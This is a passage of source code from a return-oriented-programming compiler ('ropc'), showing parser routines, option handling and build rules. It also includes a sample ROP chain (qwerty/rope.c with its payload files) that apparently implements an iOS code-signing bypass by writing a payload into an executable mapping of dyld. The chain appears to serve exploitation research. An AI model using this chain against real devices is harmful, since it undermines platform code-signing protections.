p->next; 509 | } 510 | if (n->list->next == NULL) { 511 | /* reduce xor to simple factor if possible */ 512 | p = (struct node *)n; 513 | n = (struct xor_node *)n->list; 514 | free(p); 515 | } 516 | LEAVE(); 517 | return (struct node *)n; 518 | } 519 | 520 | 521 | static struct node * 522 | R_or_exp(struct the_node *the_node) 523 | { 524 | struct or_node *n; 525 | struct node *p, *q; 526 | ENTER(); 527 | n = alloc_or_node(); 528 | n->list = R_xor_exp(the_node); 529 | for (p = n->list; IS(T_OR); ) { 530 | next_token(); /* skip '|' */ 531 | q = R_xor_exp(the_node); 532 | if (optimize_add && p->type == NODE_IMM && q->type == NODE_IMM && !is_address(AS_IMM(p)->value) && !is_address(AS_IMM(q)->value)) { 533 | char *v1 = AS_IMM(p)->value; 534 | char *v2 = AS_IMM(q)->value; 535 | AS_IMM(p)->value = create_op_str(v1, v2, '|'); 536 | free(v1); 537 | free(v2); 538 | free(q); 539 | continue; 540 | } 541 | p->next = q; 542 | p = p->next; 543 | } 544 | if (n->list->next == NULL) { 545 | /* reduce or to simple factor if possible */ 546 | p = (struct node *)n; 547 | n = (struct or_node *)n->list; 548 | free(p); 549 | } 550 | LEAVE(); 551 | return (struct node *)n; 552 | } 553 | 554 | 555 | static struct node * 556 | R_assignment_exp(struct the_node *the_node) 557 | { 558 | struct node *n; 559 | ENTER(); 560 | /* we cannot tell here if we have lvalue or rvalue, so use magic */ 561 | n = R_or_exp(the_node); 562 | if (n->type == NODE_LVAL && IS(T_ASSIGN)) { 563 | next_token(); /* skip '=' */ 564 | n->next = R_assignment_exp(the_node); 565 | } 566 | LEAVE(); 567 | return n; 568 | } 569 | 570 | 571 | static BOOL 572 | R_jump_stat(struct the_node *the_node, struct the_node *ante, struct the_node *post) 573 | { 574 | ENTER(); 575 | if (IS(T_K_BREAK)) { 576 | if (!post) { 577 | die("'break' not in loop\n"); 578 | } 579 | next_token(); /* skip 'break' */ 580 | the_node->jump = new_name("ops"); 581 | post->labels = new_label(post->labels, the_node->jump); 582 | } else if (IS(T_K_CONTINUE)) 
{ 583 | if (!ante) { 584 | die("'continue' not in loop\n"); 585 | } 586 | next_token(); /* skip 'continue' */ 587 | the_node->jump = new_name("ops"); 588 | ante->labels = new_label(ante->labels, the_node->jump); 589 | } else if (IS(T_K_GOTO)) { 590 | next_token(); /* skip 'goto' */ 591 | if (!IS(T_ID)) { 592 | expect("label"); 593 | } 594 | the_node->jump = xstrdup(token.sym); 595 | next_token(); /* skip label */ 596 | } else { 597 | LEAVE(); 598 | return FALSE; 599 | } 600 | if (!IS(T_SEMICOLON)) { 601 | expect(";"); 602 | } 603 | next_token(); /* skip ';' */ 604 | LEAVE(); 605 | return TRUE; 606 | } 607 | 608 | 609 | static struct node * 610 | R_conditional_exp(struct the_node *the_node, enum cond_t *cond) 611 | { 612 | struct node *n = NULL; 613 | ENTER(); 614 | *cond = COND_NE; 615 | if (IS(T_LOGICNOT)) { 616 | *cond = COND_EQ; 617 | next_token(); /* skip '!' */ 618 | } 619 | if (!IS(T_OPENBRACE)) { 620 | expect("'('"); 621 | } 622 | next_token(); /* skip '(' */ 623 | if (IS(T_INT) && !strcmp(token.sym, "1")) { 624 | next_token(); /* skip 'true' */ 625 | } else if (IS(T_INT) && !strcmp(token.sym, "0")) { 626 | *cond = COND_FLIP(*cond); 627 | next_token(); /* skip 'false' */ 628 | } else { 629 | n = R_assignment_exp(the_node); 630 | } 631 | #ifdef DATA_DEBUG 632 | walk_nodes(n, 0); 633 | #endif 634 | if (!IS(T_CLOSEBRACE)) { 635 | expect("')'"); 636 | } 637 | next_token(); /* skip ')' */ 638 | LEAVE(); 639 | return n; 640 | } 641 | 642 | 643 | static void 644 | R_selection_stat_if(struct the_node *the_node, struct the_node *ante, struct the_node *post) 645 | { 646 | struct the_node *body; 647 | struct node *n; 648 | char *label = NULL; 649 | enum cond_t cond; 650 | ENTER(); 651 | next_token(); /* skip 'if' */ 652 | n = R_conditional_exp(the_node, &cond); 653 | body = create_the_node(); 654 | R_stat(body, ante, post); 655 | if (IS(T_K_ELSE)) { 656 | struct the_node *last; 657 | struct the_node *elze; 658 | struct the_node *skip = create_the_node(); 659 | 
skip->lineno = -1; /* XXX silence this node */ 660 | skip->jump = new_name("ops"); 661 | append_list(body, skip); 662 | next_token(); /* skip 'else' */ 663 | elze = create_the_node(); 664 | R_stat(elze, ante, post); 665 | if (n || cond == COND_EQ) { 666 | label = new_name("ops"); 667 | elze->labels = new_label(elze->labels, label); 668 | } 669 | last = create_the_node(); 670 | last->labels = new_label(NULL, skip->jump); 671 | append_list(skip, elze); 672 | append_list(elze, last); 673 | } else { 674 | if (!optimize_jmp) { 675 | /* XXX hack alert: if the first instruction is a "goto", don't do the inversion + skip over 676 | * this is to maintain compatibility with old code generation when 'optimize_jmp' is not enabled 677 | */ 678 | struct the_node *next; 679 | for (next = body; next && next->cond == COND_AL && !next->labels && !next->code; next = next->next) { 680 | if (next->jump) { 681 | if (n || cond == COND_NE) { 682 | label = next->jump; 683 | } else { 684 | free(next->jump); 685 | } 686 | next->jump = NULL; 687 | goto okay; 688 | } 689 | } 690 | } 691 | if (n || cond == COND_EQ) { 692 | struct the_node *skip = create_the_node(); 693 | label = new_name("ops"); 694 | skip->labels = new_label(NULL, label); 695 | append_list(body, skip); 696 | } 697 | } 698 | cond = COND_FLIP(cond); 699 | okay: 700 | append_list(the_node, body); 701 | the_node->code = n; 702 | the_node->cond = n ? 
cond : COND_AL; 703 | the_node->jump = label; 704 | LEAVE(); 705 | } 706 | 707 | 708 | static void 709 | R_selection_stat_do(struct the_node *the_node) 710 | { 711 | struct the_node *body = the_node; 712 | struct the_node *eval; 713 | struct the_node *skip; 714 | struct node *n; 715 | char *label = NULL; 716 | enum cond_t cond; 717 | ENTER(); 718 | next_token(); /* skip 'do' */ 719 | eval = create_the_node(); 720 | skip = create_the_node(); 721 | R_stat(body, eval, skip); 722 | if (!IS(T_K_WHILE)) { 723 | expect("while"); 724 | } 725 | next_token(); /* skip 'while' */ 726 | eval->lineno = token.lineno; /* XXX fix error reporting */ 727 | n = R_conditional_exp(eval, &cond); 728 | if (!IS(T_SEMICOLON)) { 729 | expect(";"); 730 | } 731 | next_token(); /* skip ';' */ 732 | append_list(eval, skip); 733 | append_list(body, eval); 734 | if (n || cond != COND_EQ) { 735 | label = new_name("ops"); 736 | body->labels = new_label(body->labels, label); 737 | } 738 | eval->code = n; 739 | eval->cond = n ? 
cond : COND_AL; 740 | eval->jump = label; 741 | LEAVE(); 742 | } 743 | 744 | 745 | static void 746 | R_selection_stat_while(struct the_node *the_node) 747 | { 748 | struct the_node *body; 749 | struct the_node *skip; 750 | struct node *n; 751 | char *label = NULL; 752 | enum cond_t cond; 753 | ENTER(); 754 | next_token(); /* skip 'while' */ 755 | n = R_conditional_exp(the_node, &cond); 756 | body = create_the_node(); 757 | skip = create_the_node(); 758 | R_stat(body, the_node, skip); 759 | if (n || cond == COND_NE) { 760 | struct the_node *back = create_the_node(); 761 | back->lineno = -1; /* XXX silence this node */ 762 | back->jump = new_name("ops"); 763 | the_node->labels = new_label(the_node->labels, back->jump); 764 | append_list(body, back); 765 | } 766 | if (n || cond == COND_EQ) { 767 | label = new_name("ops"); 768 | skip->labels = new_label(skip->labels, label); 769 | append_list(body, skip); 770 | } else if (skip->labels) { 771 | append_list(body, skip); 772 | } 773 | cond = COND_FLIP(cond); 774 | append_list(the_node, body); 775 | the_node->code = n; 776 | the_node->cond = n ? 
cond : COND_AL; 777 | the_node->jump = label; 778 | LEAVE(); 779 | } 780 | 781 | 782 | static BOOL 783 | R_selection_stat(struct the_node *the_node, struct the_node *ante, struct the_node *post) 784 | { 785 | int match = TRUE; 786 | ENTER(); 787 | if (IS(T_K_IF)) { 788 | R_selection_stat_if(the_node, ante, post); 789 | } else if (IS(T_K_DO)) { 790 | R_selection_stat_do(the_node); 791 | } else if (IS(T_K_WHILE)) { 792 | R_selection_stat_while(the_node); 793 | } else { 794 | match = FALSE; 795 | } 796 | LEAVE(); 797 | return match; 798 | } 799 | 800 | 801 | static void 802 | R_external_decl(void) 803 | { 804 | char *import; 805 | int attr, regparm = -1, restack = -1; 806 | unsigned long long val = -1; 807 | ENTER(); 808 | next_token(); /* skip 'extern' */ 809 | if (!IS(T_ID)) { 810 | expect("identifier"); 811 | } 812 | import = xstrdup(token.sym); 813 | next_token(); /* skip ID */ 814 | attr = R_attribute_spec(ATTRIB_NORETURN | ATTRIB_STDCALL | ATTRIB_REGPARM, ®parm, &restack); 815 | if (IS(T_ASSIGN)) { 816 | next_token(); /* skip '=' */ 817 | if (!IS(T_INT)) { 818 | expect("integer"); 819 | } 820 | val = strtoull(token.sym, NULL, 0); 821 | next_token(); /* skip NUMBER */ 822 | } 823 | emit_extern(import, val, attr, regparm); 824 | free(import); 825 | LEAVE(); 826 | } 827 | 828 | 829 | static struct the_node * 830 | R_stat_or_decl_list(enum TOKTYPE terminator, struct the_node *ante, struct the_node *post) 831 | { 832 | struct the_node *new_node; 833 | struct the_node *the_node = NULL; 834 | ENTER(); 835 | while (!IS(terminator)) { 836 | if (IS(T_K_EXTERN)) { 837 | R_external_decl(); 838 | if (!IS(T_SEMICOLON)) { 839 | expect(";"); 840 | } 841 | next_token(); /* skip ';' */ 842 | continue; 843 | } 844 | new_node = create_the_node(); 845 | R_stat(new_node, ante, post); 846 | the_node = append_list(the_node, new_node); 847 | } 848 | LEAVE(); 849 | return the_node; 850 | } 851 | 852 | 853 | static void 854 | R_labeled_stat(struct the_node *the_node) 855 | { 856 | 
ENTER(); 857 | while (IS(T_ID) && peek_token() == T_COLON) { 858 | the_node->labels = new_label(the_node->labels, token.sym); 859 | next_token(); /* skip ID */ 860 | next_token(); /* skip ':' */ 861 | } 862 | LEAVE(); 863 | } 864 | 865 | 866 | static void 867 | R_stat(struct the_node *the_node, struct the_node *ante, struct the_node *post) 868 | { 869 | struct node *n; 870 | ENTER(); 871 | R_labeled_stat(the_node); 872 | if (IS(T_SEMICOLON)) { 873 | next_token(); /* skip ';' */ 874 | LEAVE(); 875 | return; 876 | } 877 | if (IS(T_OPENCURLY)) { 878 | struct the_node *new_node; 879 | next_token(); /* skip '{' */ 880 | new_node = R_stat_or_decl_list(T_CLOSECURLY, ante, post); 881 | append_list(the_node, new_node); 882 | if (!IS(T_CLOSECURLY)) { 883 | expect("}"); 884 | } 885 | next_token(); /* skip '}' */ 886 | LEAVE(); 887 | return; 888 | } 889 | if (R_jump_stat(the_node, ante, post)) { 890 | LEAVE(); 891 | return; 892 | } 893 | if (R_selection_stat(the_node, ante, post)) { 894 | LEAVE(); 895 | return; 896 | } 897 | n = R_assignment_exp(the_node); 898 | #ifdef DATA_DEBUG 899 | walk_nodes(n, 0); 900 | #endif 901 | the_node->code = n; 902 | if (!IS(T_SEMICOLON)) { 903 | expect(";"); 904 | } 905 | next_token(); /* skip ';' */ 906 | LEAVE(); 907 | } 908 | 909 | 910 | struct the_node * 911 | parse(void) 912 | { 913 | next_token(); /* pre-prime the first token */ 914 | return R_stat_or_decl_list(T_EOI, NULL, NULL); 915 | } 916 | -------------------------------------------------------------------------------- /parser.h: -------------------------------------------------------------------------------- 1 | #ifndef PARSER_H_ 2 | #define PARSER_H_ 3 | 4 | struct the_node *parse(void); 5 | 6 | #endif 7 | -------------------------------------------------------------------------------- /qwerty/payload.asm: -------------------------------------------------------------------------------- 1 | ;%define ROPE_ADDRESS 0x100000 2 | ;%define CACHE_SLIDE 0x200000 3 | 4 | segment .text 5 | org 
ROPE_ADDRESS 6 | 7 | %macro dg 1 8 | dd %1 + CACHE_SLIDE ; just add the slide at compile-time 9 | %endmacro 10 | ;%define dg dd CACHE_SLIDE + 11 | 12 | %define du dd ; we are org-ed at the right address 13 | 14 | rope: 15 | ; assume we pivot by LDMIA R0, {SP,PC} 16 | du __ropstack + 4 ; -> SP 17 | __ropstack: 18 | %include "rope.asm" 19 | align 8 20 | payload: 21 | %include "payload.inc" 22 | align 8 23 | dyld_header: 24 | times 0x1000 dd 0 25 | -------------------------------------------------------------------------------- /qwerty/payload.inc: -------------------------------------------------------------------------------- 1 | ; generated 2 | db 0xfd, 0x37, 0x7a, 0x58, 0x5a, 0x00, 0x00, 0x00, 0xff, 0x12, 0xd9, 0x41, 0x02, 0xc0, 0x0c, 0x08 3 | db 0x21, 0x01, 0x16, 0x00, 0x9e, 0xdb, 0x7c, 0xa9, 0x01, 0x00, 0x07, 0x2a, 0x00, 0xa0, 0xe3, 0x1e 4 | db 0xff, 0x2f, 0xe1, 0x00, 0x00, 0x01, 0x18, 0x08, 0x40, 0xa5, 0x46, 0xac, 0x06, 0x72, 0x9e, 0x7a 5 | db 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x59, 0x5a 6 | -------------------------------------------------------------------------------- /qwerty/rope.c: -------------------------------------------------------------------------------- 1 | // 935csbypass 32bit ROP implementation 2 | // Yes, the ROP works. No, the POC does not. 
:P 3 | // 4 | // https://github.com/kpwn/935csbypass by @qwertyoruiop 5 | // 6 | // gcc -E rope.c | ropc -mrestack=$[0x26] -g -O2 -c dyld_shared_cache_armv7s | grep -v "^###" | sed 's|\\n\", 0$|", 10, 0|' > rope.asm 7 | 8 | extern exit [[noreturn]]; 9 | extern __memcpy_chk; 10 | extern fcntl; 11 | extern mlock; 12 | extern mmap; 13 | extern mprotect; 14 | extern munmap; 15 | extern open; 16 | extern pread; 17 | extern printf; 18 | extern syslog; 19 | extern valloc; 20 | 21 | extern CFShow; 22 | extern CFDictionaryCreateMutable; 23 | extern CFDictionarySetValue; 24 | extern CFNumberCreate; 25 | extern CFRelease; 26 | extern __CFConstantStringClassReference; 27 | extern kCFAllocatorDefault; 28 | extern kCFTypeDictionaryKeyCallBacks; 29 | extern kCFTypeDictionaryValueCallBacks; 30 | 31 | extern IOSurfaceAcceleratorCreate; 32 | extern IOSurfaceAcceleratorTransferSurface; 33 | extern IOSurfaceCreate; 34 | extern kIOSurfaceAllocSize; 35 | extern kIOSurfaceBytesPerElement; 36 | extern kIOSurfaceBytesPerRow; 37 | extern kIOSurfaceHeight; 38 | extern kIOSurfacePixelFormat; 39 | extern kIOSurfaceWidth; 40 | 41 | extern lzma_stream_buffer_decode; 42 | 43 | #if 1 44 | #define kCFAllocatorDefault *kCFAllocatorDefault// or just use NULL... 
45 | #else 46 | #define kCFAllocatorDefault 0 47 | #endif 48 | 49 | #define kCFNumberSInt32Type 3 50 | #define kCFNumberSInt64Type 4 51 | 52 | #define O_RDONLY 0x0000 /* open for reading only */ 53 | 54 | #define F_ADDFILESIGS 61 /* add signature from same file (used by dyld for shared libs) */ 55 | #define F_ADDFILESIGS_RETURN 97 /* Add signature from same file, return end offset in structure on sucess */ 56 | 57 | #define MH_MAGIC 0xfeedface /* the mach magic number */ 58 | 59 | #define LC_CODE_SIGNATURE 0x1d /* local of code signature */ 60 | 61 | #define PAGE_SIZE 4096 62 | 63 | #define PROT_READ 0x01 /* [MC2] pages can be read */ 64 | #define PROT_WRITE 0x02 /* [MC2] pages can be written */ 65 | #define PROT_EXEC 0x04 /* [MC2] pages can be executed */ 66 | 67 | #define MAP_PRIVATE 0x0002 /* [MF|SHM] changes are private */ 68 | #define MAP_ANON 0x1000 /* allocated from memory, swap space */ 69 | #define MAP_FILE 0x0000 /* map from file (default) */ 70 | 71 | volatile src = valloc(4096); 72 | #if 0 73 | __memcpy_chk(src, &payload, 8, -1); 74 | #else 75 | memlimit = { 0x20000000, 0 }; 76 | inPos = 0; 77 | outPos = 0; 78 | lzma_stream_buffer_decode(memlimit, 0, 0, &payload, &inPos, 56, src, &outPos, 4096); 79 | #endif 80 | 81 | _fd = fd_ = fd = open("/usr/lib/dyld", O_RDONLY); 82 | 83 | // XXX I am pretty sure we'll find the magic eventually, so I skipped some sanity checks to KISS 84 | off = -0x1000; 85 | scan: 86 | off = off + 0x1000; 87 | [[stack]]pread(fd, &dyld_header, 0x4000, off, 0); 88 | hdr = &dyld_header; // XXX can't use *dyld_header here, because it'll think it's a pointer 89 | if (*hdr + -MH_MAGIC) goto scan; // if (*dyld_header != MH_MAGIC) goto scan; 90 | protmap = off; 91 | 92 | // XXX I am pretty sure we'll find the command eventually, so I skipped some sanity checks to KISS 93 | lc = &dyld_header + 28; // sizeof(struct mach_header) 94 | cmds: 95 | if !(*lc + -LC_CODE_SIGNATURE) goto done; // if (lc->cmd == LC_CODE_SIGNATURE) break; 96 | pcmdsize 
= lc + 4; // offsetof(cmdsize) 97 | lc = lc + *pcmdsize; 98 | goto cmds; 99 | done: 100 | 101 | psiginfo = siginfo = { 0, 0, 0, 0 }; // just to avoid volatile 102 | *siginfo = off; // siginfo.fs_file_start=off 103 | __memcpy_chk(siginfo + 8, lc + 8, 8, -1); // siginfo.fs_blob_start = (void*)codeSigCmd->dataoff; siginfo.fs_blob_size = codeSigCmd->datasize 104 | 105 | result = fcntl(fd_, F_ADDFILESIGS_RETURN, psiginfo); 106 | syslog(3, "Sigload %x\n", result); 107 | 108 | width = 64; // PAGE_SIZE / (16*4) 109 | height = 16; 110 | pitch = 256; // width * 4 111 | size = 4096; // width * height * 4 112 | bPE = 4; 113 | pixelFormat = "ARGB"; 114 | volatile kIOSurfaceAddress = { __CFConstantStringClassReference, 0x7c8, "IOSurfaceAddress", 16 }; 115 | 116 | volatile dict = CFDictionaryCreateMutable(kCFAllocatorDefault, 0, kCFTypeDictionaryKeyCallBacks, kCFTypeDictionaryValueCallBacks); 117 | CFDictionarySetValue(dict, *kIOSurfaceBytesPerRow, CFNumberCreate(kCFAllocatorDefault, kCFNumberSInt32Type, &pitch)); 118 | CFDictionarySetValue(dict, *kIOSurfaceBytesPerElement, CFNumberCreate(kCFAllocatorDefault, kCFNumberSInt32Type, &bPE)); 119 | CFDictionarySetValue(dict, *kIOSurfaceWidth, CFNumberCreate(kCFAllocatorDefault, kCFNumberSInt32Type, &width)); 120 | CFDictionarySetValue(dict, *kIOSurfaceHeight, CFNumberCreate(kCFAllocatorDefault, kCFNumberSInt32Type, &height)); 121 | CFDictionarySetValue(dict, *kIOSurfacePixelFormat, CFNumberCreate(kCFAllocatorDefault, kCFNumberSInt32Type, pixelFormat)); 122 | CFDictionarySetValue(dict, *kIOSurfaceAllocSize, CFNumberCreate(kCFAllocatorDefault, kCFNumberSInt32Type, &size)); 123 | 124 | IOSurfaceAcceleratorCreate(kCFAllocatorDefault, 0, &accel); 125 | 126 | IOSurfaceAcceleratorTransferSurface(0,0,0,0,0,0,0); 127 | mprotect(0,0,0); 128 | mlock(0,0); 129 | mmap(0,0,0,0,0,0); 130 | IOSurfaceCreate(0); 131 | 132 | src64 = { 0, 0 }; 133 | *src64 = src; 134 | CFDictionarySetValue(dict, kIOSurfaceAddress, CFNumberCreate(kCFAllocatorDefault, 
kCFNumberSInt64Type, src64)); 135 | //CFShow(dict); 136 | srcSurf_ = srcSurf = IOSurfaceCreate(dict); 137 | volatile addr = mmap(0, PAGE_SIZE, PROT_READ + PROT_EXEC, MAP_FILE + MAP_PRIVATE, _fd, protmap); 138 | //printf("addr = %x\n", addr); 139 | mprotect(addr, PAGE_SIZE, PROT_READ + PROT_WRITE); 140 | addr64 = { 0, 0 }; 141 | *addr64 = addr; 142 | CFDictionarySetValue(dict, kIOSurfaceAddress, CFNumberCreate(kCFAllocatorDefault, kCFNumberSInt64Type, addr64)); 143 | //CFShow(dict); 144 | destSurf_ = destSurf = IOSurfaceCreate(dict); 145 | mprotect(addr, PAGE_SIZE, PROT_READ + PROT_EXEC); 146 | mlock(addr, PAGE_SIZE); 147 | 148 | if (IOSurfaceAcceleratorTransferSurface(accel, srcSurf, destSurf, 0, 0, 0, 0)) goto die; 149 | 150 | CFRelease(destSurf_); 151 | CFRelease(srcSurf_); 152 | 153 | exit(addr()); 154 | 155 | die: 156 | syslog(3, "fail\n"); 157 | exit(-1); 158 | -------------------------------------------------------------------------------- /qwerty/test.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | typedef void __attribute__((noreturn)) (*pivot_t)(void *); 11 | 12 | static pivot_t 13 | get_pivot(void) 14 | { 15 | extern char some_symbol_in_cache[]; 16 | return (pivot_t)(((uintptr_t)some_symbol_in_cache & ~1) + some_offset_to_hit_ldmia); // assume we pivot by LDMIA R0, {SP,PC} 17 | } 18 | 19 | #define ROPSTACK_SIZE (1024 * 1024) 20 | #define RESERVE_SPACE 0x10000 21 | 22 | static unsigned char * 23 | read_file(const char *filename, off_t off, size_t *size) 24 | { 25 | int fd; 26 | size_t rv, sz; 27 | struct stat st; 28 | unsigned char *buf; 29 | 30 | fd = open(filename, O_RDONLY); 31 | if (fd < 0) { 32 | return NULL; 33 | } 34 | 35 | rv = fstat(fd, &st); 36 | if (rv) { 37 | close(fd); 38 | return NULL; 39 | } 40 | 41 | if (off > st.st_size) { 42 | off = st.st_size; 43 | } 44 | sz = st.st_size - off; 45 | 46 | buf 
= malloc(sz); 47 | if (buf == NULL) { 48 | close(fd); 49 | return NULL; 50 | } 51 | 52 | rv = pread(fd, buf, sz, off); /* honour the requested offset: sz was computed as st_size - off, so the data must start at off too */ 53 | close(fd); 54 | 55 | if (rv != sz) { 56 | free(buf); 57 | return NULL; 58 | } 59 | 60 | if (size != NULL) { 61 | *size = sz; 62 | } 63 | return buf; 64 | } 65 | 66 | int 67 | main(void) 68 | { 69 | int rv; 70 | size_t sz; 71 | unsigned char *buf, *stack; 72 | pivot_t pivot = get_pivot(); 73 | intptr_t slide = _dyld_get_image_vmaddr_slide(1); 74 | char cmd[BUFSIZ]; 75 | 76 | printf("slide: 0x%zx\n", slide); 77 | printf("pivot: %p\n", (void *)pivot); 78 | 79 | stack = valloc(ROPSTACK_SIZE); 80 | printf("stack: %p\n", (void *)stack); 81 | assert(stack); 82 | 83 | stack += RESERVE_SPACE; 84 | 85 | snprintf(cmd, sizeof(cmd), "nasm -o rope.bin -O6 -fbin -DCACHE_SLIDE=0x%zx -DROPE_ADDRESS=%p payload.asm", slide, (void *)stack); 86 | rv = system(cmd); 87 | assert(rv == 0); 88 | 89 | buf = read_file("rope.bin", 0, &sz); 90 | assert(buf && sz + RESERVE_SPACE < ROPSTACK_SIZE); 91 | memcpy(stack, buf, sz); 92 | 93 | pivot(stack); 94 | return 0; 95 | } 96 | -------------------------------------------------------------------------------- /ropc.c: -------------------------------------------------------------------------------- 1 | /* 2 | * ROP Compiler 3 | * 4 | * Copyright (c) 2012 xerub 5 | * 6 | * This program is free software; you can redistribute it and/or modify 7 | * it under the terms of the GNU General Public License as published by 8 | * the Free Software Foundation; either version 2 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * This program is distributed in the hope that it will be useful, 12 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU General Public License 17 | * along with this program. If not, see .
18 | */ 19 | 20 | 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include "config.h" 29 | #include "util.h" 30 | #include "lexer.h" 31 | #include "parser.h" 32 | #include "code.h" 33 | #include "symtab.h" 34 | #include "backend.h" 35 | 36 | 37 | int test_gadgets = 0; 38 | int optimize_imm = 0; 39 | int optimize_add = 0; 40 | int optimize_reg = 0; 41 | int optimize_jmp = 0; 42 | int show_reg_set = 0; 43 | int nasm_esc_str = 0; 44 | int enable_cfstr = 0; 45 | int no_undefined = 0; 46 | int all_volatile = 0; 47 | int new_name_off = 0; 48 | int inloop_stack = 256; 49 | extern unsigned long gadget_limit; 50 | 51 | static const char *outfile = NULL; 52 | static const char *binary = NULL; 53 | const unsigned char *binmap = NULL; 54 | size_t binsz = 0; 55 | 56 | 57 | static int 58 | check_args(int argc, char **argv) 59 | { 60 | int i; 61 | const char *p; 62 | for (i = 1; i < argc && *(p = argv[i]) == '-'; i++) { 63 | const char *q = p + 2; 64 | if (!strcmp(p, "-h")) { 65 | printf("usage: %s [-O2] [-O{i|a|r|j}] [-mrestack=S] [-g] [-n] [a] [-c cache [-l limit]] [-t] [-o output] file\n" 66 | " -mrestack number of words to reserve on the stack prior to calls\n" 67 | " -Oi optimize immediate assignment\n" 68 | " -Oa optimize simple arithmetic\n" 69 | " -Or optimize register usage\n" 70 | " -Oj optimize jumps\n" 71 | " -O2 all of the above\n" 72 | " -o write output to file\n" 73 | " -c file to link against: gadgets, imports\n" 74 | " -l limit the size of the file for gadgets\n" 75 | " -t test gadgets (used with -c)\n" 76 | " -g print detailed register usage\n" 77 | " -n emit NASM escaped strings: `hello\\n`\n" 78 | " -a accept Apple NSString-like constructs: @\"Hello\"\n" 79 | " -fvolatile force all unqualified vars to be volatile\n" 80 | " -mgenstart start internal name numbering\n" 81 | " -u emit undefined symbols\n" 82 | " -V print version and exit\n" 83 | , argv[0]); 84 | exit(0); 85 | } 86 | if (!strcmp(p, "-V")) { 87 
| printf("ropc %s v" ROPC_VERSION "\n", backend_name()); 88 | exit(0); 89 | } 90 | switch (p[1]) { 91 | case 'O': 92 | if (*q == '2') { 93 | optimize_imm = 1; 94 | optimize_add = 1; 95 | optimize_reg = 1; 96 | optimize_jmp = 1; 97 | q++; 98 | break; 99 | } 100 | do { 101 | switch (*q) { 102 | case 'i': optimize_imm = 1; continue; 103 | case 'a': optimize_add = 1; continue; 104 | case 'r': optimize_reg = 1; continue; 105 | case 'j': optimize_jmp = 1; continue; 106 | } 107 | errx(1, "unrecognized option '%s'", p); 108 | } while (*++q); 109 | break; 110 | case 'g': 111 | show_reg_set = 1; 112 | break; 113 | case 'n': 114 | nasm_esc_str = 1; 115 | break; 116 | case 'a': 117 | enable_cfstr = 1; 118 | break; 119 | case 'u': 120 | no_undefined = 1; 121 | break; 122 | case 't': 123 | test_gadgets++; 124 | break; 125 | case 'c': 126 | if (++i >= argc) { 127 | errx(1, "argument to '%s' is missing", p); 128 | } 129 | binary = argv[i]; 130 | break; 131 | case 'l': 132 | if (++i >= argc) { 133 | errx(1, "argument to '%s' is missing", p); 134 | } 135 | gadget_limit = strtoul(argv[i], (char **)&q, 0); 136 | break; 137 | case 'o': 138 | if (++i >= argc) { 139 | errx(1, "argument to '%s' is missing", p); 140 | } 141 | outfile = argv[i]; 142 | break; 143 | case 'f': 144 | if (!strcmp(q, "volatile")) { 145 | all_volatile = 1; 146 | q += 8; 147 | break; 148 | } 149 | q = p; 150 | break; 151 | case 'm': 152 | if (!strncmp(q, "restack=", 8)) { 153 | inloop_stack = strtoul(q + 8, (char **)&q, 0); 154 | break; 155 | } 156 | if (!strncmp(q, "genstart=", 9)) { 157 | new_name_off = strtoul(q + 9, (char **)&q, 10); 158 | break; 159 | } 160 | default: 161 | q = p; 162 | } 163 | if (*q) { 164 | errx(1, "unrecognized option '%s'", p); 165 | } 166 | } 167 | return i; 168 | } 169 | 170 | 171 | int 172 | main(int argc, char **argv) 173 | { 174 | FILE *f; 175 | const char *filename = NULL; 176 | struct the_node *list = NULL; 177 | 178 | int i = check_args(argc, argv); 179 | 180 | if (binary) { 181 | 
int fd = -1; 182 | long sz = 0; 183 | fd = open(binary, O_RDONLY); 184 | if (fd < 0) { 185 | err(1, "%s", binary); /* filename is still NULL here; report the cache file that failed to open */ 186 | } 187 | 188 | sz = lseek(fd, 0, SEEK_END); 189 | 190 | binmap = mmap(NULL, sz, PROT_READ, MAP_SHARED, fd, 0); 191 | if (binmap == MAP_FAILED) { 192 | err(1, "%s", binary); /* same: the mapping failure concerns the -c file, not the source file */ 193 | } 194 | binsz = sz; 195 | close(fd); 196 | 197 | if (test_gadgets > 0) { 198 | int rv = backend_test_gadgets(test_gadgets - 1); 199 | munmap((char *)binmap, binsz); 200 | return rv; 201 | } 202 | } 203 | 204 | if (argc > i) { 205 | filename = argv[i]; 206 | token.filename = strdup(filename); 207 | f = fopen(filename, "rt"); 208 | if (!f) { 209 | err(1, "%s", filename); 210 | } 211 | } else { 212 | token.filename = strdup(""); 213 | f = stdin; 214 | } 215 | init_tokens(f); 216 | 217 | new_printer(outfile); 218 | 219 | list = parse(); 220 | emit_code(list); 221 | emit_symbols(); 222 | free_symbols(); 223 | free_tokens(TRUE); 224 | 225 | new_printer(NULL); 226 | 227 | if (filename) { 228 | fclose(f); 229 | } 230 | 231 | munmap((char *)binmap, binsz); 232 | return 0; 233 | } 234 | -------------------------------------------------------------------------------- /sample/Makefile: -------------------------------------------------------------------------------- 1 | all: rop-x86 rop-x86_64 rop-arm rop-arm64 2 | 3 | 4 | rop-x86: wrap-x86.asm rop-x86.asm 5 | nasm -o $@ -O6 $< 6 | 7 | rop-x86.asm: rop-x86.i 8 | ./ropc-x86 -o $@ -O2 -g -n -c dyld_shared_cache_i386 $< 9 | 10 | rop-x86.i: rope.c 11 | gcc -o $@ -DBITS=32 -E $< 12 | 13 | 14 | rop-x86_64: wrap-x86_64.asm rop-x86_64.asm 15 | nasm -o $@ -O6 $< 16 | 17 | rop-x86_64.asm: rop-x86_64.i 18 | ./ropc-x86_64 -o $@ -O2 -g -n -c dyld_shared_cache_x86_64 $< 19 | 20 | rop-x86_64.i: rope.c 21 | gcc -o $@ -DBITS=64 -E $< 22 | 23 | 24 | rop-arm: wrap-arm.asm rop-arm.asm 25 | nasm -o $@ -O6 $< 26 | 27 | rop-arm.asm: rop-arm.i 28 | ./ropc-arm -o $@ -O2 -g -n -c dyld_shared_cache_armv7 $< 29 | 30 | rop-arm.i: rope.c 31 | gcc -o $@
